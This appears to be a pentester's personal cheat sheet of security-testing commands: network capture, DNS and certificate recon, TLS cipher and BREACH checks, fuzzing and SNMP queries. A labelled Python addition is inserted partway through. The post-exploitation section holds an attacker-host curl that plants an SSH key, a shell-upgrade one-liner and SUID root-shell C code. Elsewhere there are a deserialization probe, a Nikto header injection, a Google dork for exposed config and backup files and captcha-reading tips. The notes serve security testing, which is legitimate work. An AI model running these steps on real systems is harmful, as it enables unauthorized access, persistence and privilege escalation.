Just some tips I found useful

Security tools

TCPDUMP

Only ICMP traffic, without resolving hostnames or port names (-nn):

tcpdump -nni <IF> icmp

Capture only packets from a specific source host, or to a specific destination host:

tcpdump -nni <IF> src host <IP>
tcpdump -nni <IF> dst host <IP>

Nikto tips

Header injection through the User-Agent (Nikto copies it verbatim into the request). From: https://www.sjoerdlangkemper.nl/2016/11/28/header-injection-in-nikto/

nl=$'\n'
cr=$'\r'
nikto -host http://example.com/ -useragent "nikto${cr}${nl}Some: header"

Or open “plugins/nikto_core.plugin”, search for “setup_hash”, and add a line like the one below:

$reqhash->{'Some-Key'} = "header value";

DNS

DNS zone transfer:

$ dig axfr truc.org @<IP>
[...]

hr.truc.org...
uploads.truc.org...
admin.truc.org...

DNS research

Query the crt.sh database directly (lists every name found in certificates for the domain). Ticket from: https://groups.google.com/forum/#!topic/crtsh/oEDOzwr2Fuc

#!/bin/sh
# Usage: ./crtsh.sh example.com  -> prints every *.example.com name seen in certificates
domain="$1"
[ -n "$domain" ] || { echo "usage: $0 <domain>" >&2; exit 1; }
query="SELECT ci.NAME_VALUE NAME_VALUE FROM certificate_identity ci WHERE ci.NAME_TYPE = 'dNSName' AND reverse(lower(ci.NAME_VALUE)) LIKE reverse(lower('%.${domain}'));"
echo "$query" | \
psql -t -h crt.sh -p 5432 -U guest certwatch | \
sed -e 's:^ *::g' -e 's:^\*\.::g' -e '/^$/d' | \
sort -u | sed -e 's:\*\.::g'

Another possibility is https://findsubdomains.com/subdomains-of/free.fr
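The same cleanup the shell pipeline does, as an added Python example that is not part of the original notes: it normalises crt.sh's JSON output (the `output=json` endpoint and its `name_value`/`common_name` fields are assumed from that API; the records below are constructed), splits the newline-packed SAN lists, folds wildcards and rejects look-alike names such as notexample.com that a naive suffix match would keep.

```python
import json

# Constructed sample in the shape of https://crt.sh/?q=%25example.com&output=json
# (field names assumed from that API); real responses carry more fields and records.
SAMPLE_CRTSH_JSON = json.dumps([
    {"id": 1, "common_name": "www.example.com",
     "name_value": "www.example.com\nexample.com"},
    {"id": 2, "common_name": "*.example.com",
     "name_value": "*.example.com\nmail.example.com"},
    {"id": 3, "common_name": "Uploads.Example.com",
     "name_value": "Uploads.Example.com"},
    # Ends in the same string but is a different registrable domain.
    {"id": 4, "common_name": "notexample.com", "name_value": "notexample.com"},
])


def in_zone(name: str, domain: str) -> bool:
    """True if name is domain itself or a label-aligned subdomain of it."""
    return name == domain or name.endswith("." + domain)


def subdomains_from_crtsh(raw_json: str, domain: str) -> list:
    """Return a sorted, unique list of hostnames under domain found in crt.sh JSON.

    Mirrors the shell pipeline: lowercase, one name per line (name_value packs
    several SANs separated by newlines), leading '*.' removed, duplicates dropped.
    """
    domain = domain.lower().rstrip(".")
    found = set()
    for record in json.loads(raw_json):
        candidates = record.get("name_value", "").split("\n")
        candidates.append(record.get("common_name", ""))
        for cand in candidates:
            name = cand.strip().lower().rstrip(".")
            if name.startswith("*."):
                name = name[2:]  # wildcard cert: keep the zone it covers
            if name and in_zone(name, domain):
                found.add(name)
    return sorted(found)


if __name__ == "__main__":
    for host in subdomains_from_crtsh(SAMPLE_CRTSH_JSON, "example.com"):
        print(host)
```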

Enumerate SSL/TLS ciphers using nmap (the script is passed as the value of --script):

nmap --script ssl-enum-ciphers -p 443 <HOST>

Testing compression manually:

echo "" | openssl s_client -tls1 -connect host:443 | grep Compression
echo "" | openssl s_client -tls1_1 -connect host:443 | grep Compression
echo "" | openssl s_client -tls1_2 -connect host:443 | grep Compression

Testing BREACH manually:

openssl s_client -tls1 -connect host:443
GET / HTTP/1.0
Host: host
Accept-Encoding: compress, gzip
Referer: <DIFFERENT FROM THE HOST>

If the returned data is compressed, the server is vulnerable: HTTP-level response compression is the precondition BREACH needs.

More info: https://en.wikipedia.org/wiki/BREACH.

Newer TLS vulns (CBC padding oracles): check https://github.com/Tripwire/padcheck

Testssl

testssl through a proxy:

testssl --proxy http://127.0.0.1:8080 https://www.example.com

I personally use the following commands to get all cipher suites:

testssl.sh -E -p -S -P --headers -U https://www.example.com

SSLScan

Scan a target using a client certificate:

sslscan --show-ciphers --show-certificate --pk=client_cert.pfx --pkpass=password --xml=outputlog.xml https://target.fr

SSLYZE

Install using pip:

$ pip install --user sslyze
$ python -m sslyze --regular <TARGET>:443

More info: https://github.com/nabla-c0d3/sslyze

SSL configuration generator

Check: https://mozilla.github.io/server-side-tls/ssl-config-generator/

SSL certificates

Take a look at http://crt.sh/ : https://crt.sh/?q=%25lexfo.fr%25

Tesseract

Limit recognition to 6 characters, uppercase letters and digits only, treating the image as a single text line (-psm 7):

tesseract image.png -c textord_width_limit=6 -c tessedit_char_whitelist=1234567890AZERTYUIOPMLKJHGFDSQWXCVBN -psm 7 -

TesserCap

See TesserCap to automate some preprocessing before trying to “read” the picture: https://github.com/gursev/TesserCap. TesserCap does not like IP addresses; add your host to C:/Windows/System32/drivers/etc/hosts.

EXE only, so be careful!

Traceroute

Scapy (tcptraceroute.py) or MTR (http://linux-attitude.fr/post/traceroute-et-mtr).

Captcha

Nice CAPTCHA attempt, but maybe too complex for Mme Michu (the average user): https://github.com/gursev/pixel-captcha-project.

PHP WMI query

<?php
// Connect to the local WMI service and kill every process whose command line contains "whoami"
$wmi = new COM('winmgmts://');
$processes = $wmi->ExecQuery("SELECT * FROM Win32_Process");
foreach ($processes as $process) {
    // CommandLine can be null for some system processes, hence the cast
    if (strpos((string) $process->CommandLine, "whoami") !== false) {
        echo $process->ProcessId . "<br />";
        echo $process->CommandLine . "<br />";
        $process->Terminate();
    }
}

Post-exploitation

Get a TTY shell after reverse shell connection

python -c 'import pty; pty.spawn("/bin/bash")'
# the module is pty, not tty; check whether the box has /bin/bash, /bin/sh or whatever

Export the PATH, TERM and SHELL variables if missing (PATH entries are separated by ':'):

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=/bin/bash

Install the attacker's public key

echo $(curl http://X.X.X.X/id_rsa.pub) >> ~/.ssh/authorized_keys

Generate SUID C shell

#define _GNU_SOURCE          /* setresuid() is a GNU extension */
#include <stdlib.h>
#include <unistd.h>
int main(void) {
  setresuid(0, 0, 0);        /* drop the saved uid too, so the shell stays root */
  system("/bin/bash");
  return 0;
}

Serialization / Deserialization

https://www.insomniasec.com/downloads/publications/Practical%20PHP%20Object%20Injection.pdf

Send this serialized string; if the response is a 500 error, user input is passed to unserialize() server side:

O:12:"PDOStatement":0:{}

XXE

SSRF

https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/

Tomcat pentest

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/february/compromising-apache-tomcat-via-jmx-access/

Payloads

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection

Out of Band Exploitation (OOB) CheatSheet

Exfiltration, DNS, etc.

Credit card generator

Web crawler & analyzer

WFUZZ

https://github.com/xmendez/wfuzz, written in Python.

Match an ‘Allow’ header in the HTTP response headers:

wfuzz -X <GET/POST/OPTIONS> --filter "r.raw_content~'Allow'" -w <dict.txt> -H 'Access-Control-Request-Method: GET' -p localhost:8080 <TARGET>

Standalone client: Postman

WebService

Standalone client: SoapUI

Get a DNS server's internal name using dig (hostname.bind in the CHAOS class, plus the NSID option):

$ dig +nsid CH TXT hostname.bind @<IP>
# example
$ dig +nsid CH TXT hostname.bind @67.205.168.227
[..]
;; ANSWER SECTION:
hostname.bind.      0   CH  TXT "mail.nasershipping.com-1563290346967-s-2vcpu-2gb-nyc1-01"
[...]

Extensions to use for fuzzing

  • .swp, .bak, .inc, .php, .txt, .xml, .config

SNMP

  • SNMP v2c request:
    snmpwalk -v2c -c public <IP> .1
  • SNMP v3 request:
    snmpwalk -v3 -l authPriv -u snmp-poller -a SHA -A "PASSWORD1" -x AES -X "PASSWORD1" 10.10.60.50

Google dork list

site:"target[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess

Last updated on Wednesday, May 6, 2020
Published on Wednesday, May 6, 2020